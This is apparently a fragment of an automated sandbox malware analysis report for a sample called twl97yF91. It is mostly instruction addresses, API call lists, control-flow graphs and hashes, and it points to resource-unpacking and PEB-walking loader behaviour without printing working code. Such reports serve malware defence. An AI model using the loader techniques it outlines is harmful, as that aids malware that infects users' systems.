                                                                                                                                                                                                          0x00401c21
                                                                                                                                                                                                          0x00401c26
                                                                                                                                                                                                          0x00401c2b
                                                                                                                                                                                                          0x00401c30
                                                                                                                                                                                                          0x00401c35
                                                                                                                                                                                                          0x00401c3a
                                                                                                                                                                                                          0x00401c3f
                                                                                                                                                                                                          0x00401c44
                                                                                                                                                                                                          0x00401c48
                                                                                                                                                                                                          0x00401c4f
                                                                                                                                                                                                          0x00401dc3
                                                                                                                                                                                                          0x00401dc4
                                                                                                                                                                                                          0x00401de0
                                                                                                                                                                                                          0x00401de2
                                                                                                                                                                                                          0x00401de7
                                                                                                                                                                                                          0x00401dec
                                                                                                                                                                                                          0x00401df1
                                                                                                                                                                                                          0x00401df6
                                                                                                                                                                                                          0x00401dfb
                                                                                                                                                                                                          0x00401e00
                                                                                                                                                                                                          0x00401e05
                                                                                                                                                                                                          0x00401e0a
                                                                                                                                                                                                          0x00401e0f
                                                                                                                                                                                                          0x00401e14
                                                                                                                                                                                                          0x00401e19
                                                                                                                                                                                                          0x00401e1e
                                                                                                                                                                                                          0x00401e23
                                                                                                                                                                                                          0x00401e28
                                                                                                                                                                                                          0x00401e2d
                                                                                                                                                                                                          0x00401e32
                                                                                                                                                                                                          0x00401e37
                                                                                                                                                                                                          0x00401e3c
                                                                                                                                                                                                          0x00401e41
                                                                                                                                                                                                          0x00401e46
                                                                                                                                                                                                          0x00401e4b
                                                                                                                                                                                                          0x00401e50
                                                                                                                                                                                                          0x00401e55
                                                                                                                                                                                                          0x00401e5a
                                                                                                                                                                                                          0x00401e5f
                                                                                                                                                                                                          0x00401e64
                                                                                                                                                                                                          0x00401e69
                                                                                                                                                                                                          0x00401e6e
                                                                                                                                                                                                          0x00401e73
                                                                                                                                                                                                          0x00401e78
                                                                                                                                                                                                          0x00401e7d
                                                                                                                                                                                                          0x00401e82
                                                                                                                                                                                                          0x00401e86
                                                                                                                                                                                                          0x00401e8b
                                                                                                                                                                                                          0x00401e96
                                                                                                                                                                                                          0x00401e9a
                                                                                                                                                                                                          0x00401ea4
                                                                                                                                                                                                          0x00401eaf
                                                                                                                                                                                                          0x00401eba
                                                                                                                                                                                                          0x00401ebf
                                                                                                                                                                                                          0x00401ec4
                                                                                                                                                                                                          0x00401ec6
                                                                                                                                                                                                          0x00401ecb
                                                                                                                                                                                                          0x00401ece
                                                                                                                                                                                                          0x00401ed2
                                                                                                                                                                                                          0x00401ed4
                                                                                                                                                                                                          0x00401eef
                                                                                                                                                                                                          0x00401ed6
                                                                                                                                                                                                          0x00401edd
                                                                                                                                                                                                          0x00401ee2
                                                                                                                                                                                                          0x00401ee6
                                                                                                                                                                                                          0x00401ee9
                                                                                                                                                                                                          0x00401ee9
                                                                                                                                                                                                          0x00401ef7
                                                                                                                                                                                                          0x00401efc
                                                                                                                                                                                                          0x00401f02
                                                                                                                                                                                                          0x00401f08
                                                                                                                                                                                                          0x00401f0c
                                                                                                                                                                                                          0x00401f15
                                                                                                                                                                                                          0x00401f18
                                                                                                                                                                                                          0x00401f1a
                                                                                                                                                                                                          0x00401f1c
                                                                                                                                                                                                          0x00401f22
                                                                                                                                                                                                          0x00401f22
                                                                                                                                                                                                          0x00401f24
                                                                                                                                                                                                          0x00401f28
                                                                                                                                                                                                          0x00401f2f
                                                                                                                                                                                                          0x00401f33
                                                                                                                                                                                                          0x00401f33
                                                                                                                                                                                                          0x00401f40
                                                                                                                                                                                                          0x00401f45
                                                                                                                                                                                                          0x00401f4a
                                                                                                                                                                                                          0x00401f4b
                                                                                                                                                                                                          0x00401f50
                                                                                                                                                                                                          0x00401f58
                                                                                                                                                                                                          0x00401f58
                                                                                                                                                                                                          0x00401f58
                                                                                                                                                                                                          0x00401f58
                                                                                                                                                                                                          0x00401f33
                                                                                                                                                                                                          0x00401f63
                                                                                                                                                                                                          0x00401f63
                                                                                                                                                                                                          0x00401f69
                                                                                                                                                                                                          0x00401f72
                                                                                                                                                                                                          0x00401f72
                                                                                                                                                                                                          0x00401f72
                                                                                                                                                                                                          0x00401f73
                                                                                                                                                                                                          0x00401f75
                                                                                                                                                                                                          0x00401f7b
                                                                                                                                                                                                          0x00401f80
                                                                                                                                                                                                          0x00401f81
                                                                                                                                                                                                          0x00401f86
                                                                                                                                                                                                          0x00401f86
                                                                                                                                                                                                          0x00401f8c
                                                                                                                                                                                                          0x00401f8d
                                                                                                                                                                                                          0x00401f8d
                                                                                                                                                                                                          0x00401f9d
                                                                                                                                                                                                          0x00401fa2
                                                                                                                                                                                                          0x00401fa6
                                                                                                                                                                                                          0x00401fac
                                                                                                                                                                                                          0x00401faf
                                                                                                                                                                                                          0x00401fb6
                                                                                                                                                                                                          0x00401fbf
                                                                                                                                                                                                          0x00401fc4
                                                                                                                                                                                                          0x00401fc8
                                                                                                                                                                                                          0x00401fce
                                                                                                                                                                                                          0x00401fd3
                                                                                                                                                                                                          0x00401fe0
                                                                                                                                                                                                          0x00401fec
                                                                                                                                                                                                          0x00401ffe
                                                                                                                                                                                                          0x00402001
                                                                                                                                                                                                          0x00402006
                                                                                                                                                                                                          0x0040200b
                                                                                                                                                                                                          0x00402010
                                                                                                                                                                                                          0x00402015
                                                                                                                                                                                                          0x0040201a
                                                                                                                                                                                                          0x0040201f
                                                                                                                                                                                                          0x00402024
                                                                                                                                                                                                          0x00402029
                                                                                                                                                                                                          0x0040202e
                                                                                                                                                                                                          0x00402033
                                                                                                                                                                                                          0x00402038
                                                                                                                                                                                                          0x0040203d
                                                                                                                                                                                                          0x00402042
                                                                                                                                                                                                          0x00402047
                                                                                                                                                                                                          0x0040204c
                                                                                                                                                                                                          0x00402051
                                                                                                                                                                                                          0x00402056
                                                                                                                                                                                                          0x0040205b
                                                                                                                                                                                                          0x00402060
                                                                                                                                                                                                          0x00402065
                                                                                                                                                                                                          0x0040206a
                                                                                                                                                                                                          0x0040206f
                                                                                                                                                                                                          0x00402074
                                                                                                                                                                                                          0x00402079
                                                                                                                                                                                                          0x0040207e
                                                                                                                                                                                                          0x00402083
                                                                                                                                                                                                          0x00402088
                                                                                                                                                                                                          0x0040208d
                                                                                                                                                                                                          0x00402092
                                                                                                                                                                                                          0x00402097
                                                                                                                                                                                                          0x0040209c
                                                                                                                                                                                                          0x004020a1
                                                                                                                                                                                                          0x004020a5
                                                                                                                                                                                                          0x004020aa
                                                                                                                                                                                                          0x004020ae
                                                                                                                                                                                                          0x004020b4
                                                                                                                                                                                                          0x004020b6
                                                                                                                                                                                                          0x004020bb
                                                                                                                                                                                                          0x004020c0
                                                                                                                                                                                                          0x004020c5
                                                                                                                                                                                                          0x004020ca
                                                                                                                                                                                                          0x004020cf
                                                                                                                                                                                                          0x004020d4
                                                                                                                                                                                                          0x004020e1
                                                                                                                                                                                                          0x004020e6
                                                                                                                                                                                                          0x004020eb
                                                                                                                                                                                                          0x004020f0
                                                                                                                                                                                                          0x004020f5
                                                                                                                                                                                                          0x004020fa
                                                                                                                                                                                                          0x004020ff
                                                                                                                                                                                                          0x00402104
                                                                                                                                                                                                          0x00402109
                                                                                                                                                                                                          0x0040210e
                                                                                                                                                                                                          0x00402113
                                                                                                                                                                                                          0x00402118
                                                                                                                                                                                                          0x0040211d
                                                                                                                                                                                                          0x00402122
                                                                                                                                                                                                          0x00402127
                                                                                                                                                                                                          0x0040212c
                                                                                                                                                                                                          0x00402131
                                                                                                                                                                                                          0x00402136
                                                                                                                                                                                                          0x0040213b
                                                                                                                                                                                                          0x00402140
                                                                                                                                                                                                          0x00402145
                                                                                                                                                                                                          0x0040214a
                                                                                                                                                                                                          0x0040214f
                                                                                                                                                                                                          0x00402154
                                                                                                                                                                                                          0x00402159
                                                                                                                                                                                                          0x0040215e
                                                                                                                                                                                                          0x00402163
                                                                                                                                                                                                          0x00402167
                                                                                                                                                                                                          0x0040216c
                                                                                                                                                                                                          0x00402171
                                                                                                                                                                                                          0x00402177
                                                                                                                                                                                                          0x00402179
                                                                                                                                                                                                          0x0040217c
                                                                                                                                                                                                          0x0040217e
                                                                                                                                                                                                          0x00402183
                                                                                                                                                                                                          0x00402188
                                                                                                                                                                                                          0x0040218f
                                                                                                                                                                                                          0x00402196
                                                                                                                                                                                                          0x0040219a
                                                                                                                                                                                                          0x0040219e
                                                                                                                                                                                                          0x004021a2
                                                                                                                                                                                                          0x004021a4
                                                                                                                                                                                                          0x004021bc
                                                                                                                                                                                                          0x004021be
                                                                                                                                                                                                          0x004021c0
                                                                                                                                                                                                          0x004021c6
                                                                                                                                                                                                          0x004021ca
                                                                                                                                                                                                          0x004021e5
                                                                                                                                                                                                          0x004021ec
                                                                                                                                                                                                          0x004021f1
                                                                                                                                                                                                          0x00402213
                                                                                                                                                                                                          0x00402215
                                                                                                                                                                                                          0x00402217
                                                                                                                                                                                                          0x0040221d
                                                                                                                                                                                                          0x00402239
                                                                                                                                                                                                          0x0040223b
                                                                                                                                                                                                          0x0040223d
                                                                                                                                                                                                          0x00402243
                                                                                                                                                                                                          0x0040224d
                                                                                                                                                                                                          0x0040224f
                                                                                                                                                                                                          0x00402251
                                                                                                                                                                                                          0x00402260
                                                                                                                                                                                                          0x00402264
                                                                                                                                                                                                          0x00402269
                                                                                                                                                                                                          0x00402277
                                                                                                                                                                                                          0x0040227b
                                                                                                                                                                                                          0x00402286
                                                                                                                                                                                                          0x00402293
                                                                                                                                                                                                          0x004022af
                                                                                                                                                                                                          0x004022b1
                                                                                                                                                                                                          0x004022b5
                                                                                                                                                                                                          0x004022b7
                                                                                                                                                                                                          0x004022be
                                                                                                                                                                                                          0x004022be
                                                                                                                                                                                                          0x004022d7
                                                                                                                                                                                                          0x004022e8
                                                                                                                                                                                                          0x004022ef
                                                                                                                                                                                                          0x004022f6
                                                                                                                                                                                                          0x00402300
                                                                                                                                                                                                          0x00402304
                                                                                                                                                                                                          0x00402308
                                                                                                                                                                                                          0x00402315
                                                                                                                                                                                                          0x0040231a
                                                                                                                                                                                                          0x0040231e
                                                                                                                                                                                                          0x00402324
                                                                                                                                                                                                          0x00402328
                                                                                                                                                                                                          0x0040232a
                                                                                                                                                                                                          0x00402331
                                                                                                                                                                                                          0x00402331
                                                                                                                                                                                                          0x0040234e
                                                                                                                                                                                                          0x00402350
                                                                                                                                                                                                          0x00402352
                                                                                                                                                                                                          0x00402355
                                                                                                                                                                                                          0x00402355
                                                                                                                                                                                                          0x0040235b
                                                                                                                                                                                                          0x0040235f
                                                                                                                                                                                                          0x00402361
                                                                                                                                                                                                          0x00402368
                                                                                                                                                                                                          0x00402368
                                                                                                                                                                                                          0x0040236d
                                                                                                                                                                                                          0x00402371
                                                                                                                                                                                                          0x00402373
                                                                                                                                                                                                          0x00402375
                                                                                                                                                                                                          0x0040237b
                                                                                                                                                                                                          0x0040237b
                                                                                                                                                                                                          0x00402377
                                                                                                                                                                                                          0x00402377
                                                                                                                                                                                                          0x00402377
                                                                                                                                                                                                          0x00402390
                                                                                                                                                                                                          0x00402396
                                                                                                                                                                                                          0x0040239c
                                                                                                                                                                                                          0x004023a0
                                                                                                                                                                                                          0x004023a2
                                                                                                                                                                                                          0x004023a9
                                                                                                                                                                                                          0x004023a9
                                                                                                                                                                                                          0x004023ae
                                                                                                                                                                                                          0x004023b2
                                                                                                                                                                                                          0x004023b4
                                                                                                                                                                                                          0x004023ba
                                                                                                                                                                                                          0x004023ba
                                                                                                                                                                                                          0x004023b6
                                                                                                                                                                                                          0x004023b6
                                                                                                                                                                                                          0x004023b6
                                                                                                                                                                                                          0x004023ce
                                                                                                                                                                                                          0x004023d1
                                                                                                                                                                                                          0x004023d3
                                                                                                                                                                                                          0x004023dd
                                                                                                                                                                                                          0x004023ec
                                                                                                                                                                                                          0x004023ef
                                                                                                                                                                                                          0x004023fe
                                                                                                                                                                                                          0x00402401
                                                                                                                                                                                                          0x00402403
                                                                                                                                                                                                          0x00402411
                                                                                                                                                                                                          0x00402417
                                                                                                                                                                                                          0x00402424
                                                                                                                                                                                                          0x00402426
                                                                                                                                                                                                          0x0040242a
                                                                                                                                                                                                          0x0040242c
                                                                                                                                                                                                          0x00402434
                                                                                                                                                                                                          0x00402434
                                                                                                                                                                                                          0x0040243a
                                                                                                                                                                                                          0x0040243f
                                                                                                                                                                                                          0x00402443
                                                                                                                                                                                                          0x00402445
                                                                                                                                                                                                          0x0040244d
                                                                                                                                                                                                          0x0040244d
                                                                                                                                                                                                          0x00402445
                                                                                                                                                                                                          0x00402251
                                                                                                                                                                                                          0x0040223d
                                                                                                                                                                                                          0x0040244f
                                                                                                                                                                                                          0x0040245d
                                                                                                                                                                                                          0x0040245f
                                                                                                                                                                                                          0x00402461
                                                                                                                                                                                                          0x00402462
                                                                                                                                                                                                          0x00402467
                                                                                                                                                                                                          0x00402467
                                                                                                                                                                                                          0x0040245f
                                                                                                                                                                                                          0x004021ca
                                                                                                                                                                                                          0x0040246a
                                                                                                                                                                                                          0x0040246e
                                                                                                                                                                                                          0x00402470
                                                                                                                                                                                                          0x00402478
                                                                                                                                                                                                          0x00402478
                                                                                                                                                                                                          0x0040247a
                                                                                                                                                                                                          0x0040247e
                                                                                                                                                                                                          0x00402480
                                                                                                                                                                                                          0x00402488
                                                                                                                                                                                                          0x00402488
                                                                                                                                                                                                          0x00402480
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401c55
                                                                                                                                                                                                          0x00401c62
                                                                                                                                                                                                          0x00401c67
                                                                                                                                                                                                          0x00401c6a
                                                                                                                                                                                                          0x00401c6c
                                                                                                                                                                                                          0x00401c73
                                                                                                                                                                                                          0x00401c73
                                                                                                                                                                                                          0x00401c77
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401c7b
                                                                                                                                                                                                          0x00401c8f
                                                                                                                                                                                                          0x00401c8f
                                                                                                                                                                                                          0x00401c7d
                                                                                                                                                                                                          0x00401c7d
                                                                                                                                                                                                          0x00401c83
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401c85
                                                                                                                                                                                                          0x00401c85
                                                                                                                                                                                                          0x00401c88
                                                                                                                                                                                                          0x00401c8d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401c8d
                                                                                                                                                                                                          0x00401c83
                                                                                                                                                                                                          0x00401c98
                                                                                                                                                                                                          0x00401c9a
                                                                                                                                                                                                          0x00401cbd
                                                                                                                                                                                                          0x00401cc2
                                                                                                                                                                                                          0x00401cc5
                                                                                                                                                                                                          0x00401cc7
                                                                                                                                                                                                          0x00401cd0
                                                                                                                                                                                                          0x00401cd0
                                                                                                                                                                                                          0x00401cd2
                                                                                                                                                                                                          0x00401cd4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401cd6
                                                                                                                                                                                                          0x00401cd8
                                                                                                                                                                                                          0x00401cec
                                                                                                                                                                                                          0x00401cec
                                                                                                                                                                                                          0x00401cda
                                                                                                                                                                                                          0x00401cda
                                                                                                                                                                                                          0x00401cdd
                                                                                                                                                                                                          0x00401ce0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401ce2
                                                                                                                                                                                                          0x00401ce2
                                                                                                                                                                                                          0x00401ce5
                                                                                                                                                                                                          0x00401ce8
                                                                                                                                                                                                          0x00401cea
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401cea
                                                                                                                                                                                                          0x00401ce0
                                                                                                                                                                                                          0x00401cf5
                                                                                                                                                                                                          0x00401cf5
                                                                                                                                                                                                          0x00401cf7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401cf9
                                                                                                                                                                                                          0x00401d02
                                                                                                                                                                                                          0x00401d07
                                                                                                                                                                                                          0x00401d09
                                                                                                                                                                                                          0x00401d10
                                                                                                                                                                                                          0x00401d1d
                                                                                                                                                                                                          0x00401d22
                                                                                                                                                                                                          0x00401d25
                                                                                                                                                                                                          0x00401d27
                                                                                                                                                                                                          0x00401d30
                                                                                                                                                                                                          0x00401d30
                                                                                                                                                                                                          0x00401d32
                                                                                                                                                                                                          0x00401d34
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401d36
                                                                                                                                                                                                          0x00401d38
                                                                                                                                                                                                          0x00401d4c
                                                                                                                                                                                                          0x00401d4c
                                                                                                                                                                                                          0x00401d3a
                                                                                                                                                                                                          0x00401d3a
                                                                                                                                                                                                          0x00401d3d
                                                                                                                                                                                                          0x00401d40
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401d42
                                                                                                                                                                                                          0x00401d42
                                                                                                                                                                                                          0x00401d45
                                                                                                                                                                                                          0x00401d48
                                                                                                                                                                                                          0x00401d4a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401d4a
                                                                                                                                                                                                          0x00401d40
                                                                                                                                                                                                          0x00401d55
                                                                                                                                                                                                          0x00401d55
                                                                                                                                                                                                          0x00401d57
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401d5d
                                                                                                                                                                                                          0x00401d6a
                                                                                                                                                                                                          0x00401d6f
                                                                                                                                                                                                          0x00401d72
                                                                                                                                                                                                          0x00401d74
                                                                                                                                                                                                          0x00401d80
                                                                                                                                                                                                          0x00401d80
                                                                                                                                                                                                          0x00401d82
                                                                                                                                                                                                          0x00401d84
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401d86
                                                                                                                                                                                                          0x00401d88
                                                                                                                                                                                                          0x00401d9c
                                                                                                                                                                                                          0x00401d9c
                                                                                                                                                                                                          0x00401d8a
                                                                                                                                                                                                          0x00401d8a
                                                                                                                                                                                                          0x00401d8d
                                                                                                                                                                                                          0x00401d90
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401d92
                                                                                                                                                                                                          0x00401d92
                                                                                                                                                                                                          0x00401d95
                                                                                                                                                                                                          0x00401d98
                                                                                                                                                                                                          0x00401d9a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401d9a
                                                                                                                                                                                                          0x00401d90
                                                                                                                                                                                                          0x00401da5
                                                                                                                                                                                                          0x00401da5
                                                                                                                                                                                                          0x00401da7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401da7
                                                                                                                                                                                                          0x00401da0
                                                                                                                                                                                                          0x00401da2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401da2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401d57
                                                                                                                                                                                                          0x00401d50
                                                                                                                                                                                                          0x00401d52
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401dad
                                                                                                                                                                                                          0x00401db6
                                                                                                                                                                                                          0x00401dbb
                                                                                                                                                                                                          0x00401dbb
                                                                                                                                                                                                          0x00401d10
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401d09
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401cf7
                                                                                                                                                                                                          0x00401cf0
                                                                                                                                                                                                          0x00401cf2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401c9c
                                                                                                                                                                                                          0x00401c9c
                                                                                                                                                                                                          0x00401c9d
                                                                                                                                                                                                          0x00401caf
                                                                                                                                                                                                          0x00401caf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401c9a
                                                                                                                                                                                                          0x00401c93
                                                                                                                                                                                                          0x00401c95
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401c95
                                                                                                                                                                                                          0x00401c4f
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                                                                                          • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                                                                                          • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                                                                                                                                                                          • Module32Next.KERNEL32 ref: 00401D02
                                                                                                                                                                                                          • Module32Next.KERNEL32 ref: 00401DB6
                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401DC4
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                                                                                          • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                                                                                          • _memset.LIBCMT ref: 00401EDD
                                                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                                                                                          • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$PPNs$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                                                                                          • API String ID: 2366190142-1649027716
                                                                                                                                                                                                          • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                                                                          • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 268 2cb092b-2cb0970 GetPEB 269 2cb0972-2cb0978 268->269 270 2cb097a-2cb098a call 2cb0d35 269->270 271 2cb098c-2cb098e 269->271 270->271 276 2cb0992-2cb0994 270->276 271->269 273 2cb0990 271->273 275 2cb0996-2cb0998 273->275 277 2cb0a3b-2cb0a3e 275->277 276->275 278 2cb099d-2cb09d3 276->278 279 2cb09dc-2cb09ee call 2cb0d0c 278->279 282 2cb09f0-2cb0a3a 279->282 283 2cb09d5-2cb09d8 279->283 282->277 283->279
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                          • API String ID: 0-2784972518
                                                                                                                                                                                                          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                          • Instruction ID: bffe2ac2521a5dc990838b2244e8e02abd88255132c7227f2296f97c8e86be94
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D83138B6900619DFDB11CF99C880AEEBBF9FF48324F15414AD841A7250D771EA45CBA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 285 3050490-30504d9 290 30504e5-30504e8 285->290 291 30504db-30504dd 285->291 292 30507f3-3050874 290->292 294 30504ee-305053c 290->294 291->292 293 30504e3 291->293 293->294 303 30505ae-3050618 294->303 304 305053e-3050570 294->304 323 3050631 303->323 324 305061a-305062f 303->324 313 3050572-3050574 304->313 314 305057c-305057f 304->314 313->292 316 305057a 313->316 314->292 315 3050585-30505a8 314->315 315->303 316->315 325 3050639 323->325 327 3050644-305065a 324->327 325->327 330 3050660-3050674 327->330 331 30506fd-3050719 327->331 334 3050676-305068c 330->334 335 30506ec-30506f0 330->335 339 3050790-30507c1 331->339 340 305071b-3050726 331->340 334->331 341 305068e-305069f LdrInitializeThunk 334->341 335->330 337 30506f6 335->337 337->331 354 30507eb-30507f2 339->354 345 3050750-3050788 340->345 346 3050728-305074e 340->346 344 30506a5-30506b4 341->344 352 30506e4-30506e8 344->352 353 30506b6-30506e2 344->353 361 305078e 345->361 346->345 352->341 355 30506ea 352->355 353->331 355->331 361->354
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.322608961.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_3050000_twl97yF91.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID: {o^
                                                                                                                                                                                                          • API String ID: 2994545307-4057684116
                                                                                                                                                                                                          • Opcode ID: e2d2f20b090b0bbcc28c0798c032b55b011bbfdd12cf0a1399582881b0c1b4a1
                                                                                                                                                                                                          • Instruction ID: a2d765004d80ce2e10640f1643fcf5741005b554cb9f04c363744efdeb7bfacb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2d2f20b090b0bbcc28c0798c032b55b011bbfdd12cf0a1399582881b0c1b4a1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90B117387115008FC754DF29D998A2ABBE6FF88714B2585A9F906CB3B1DB31EC45CB90
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
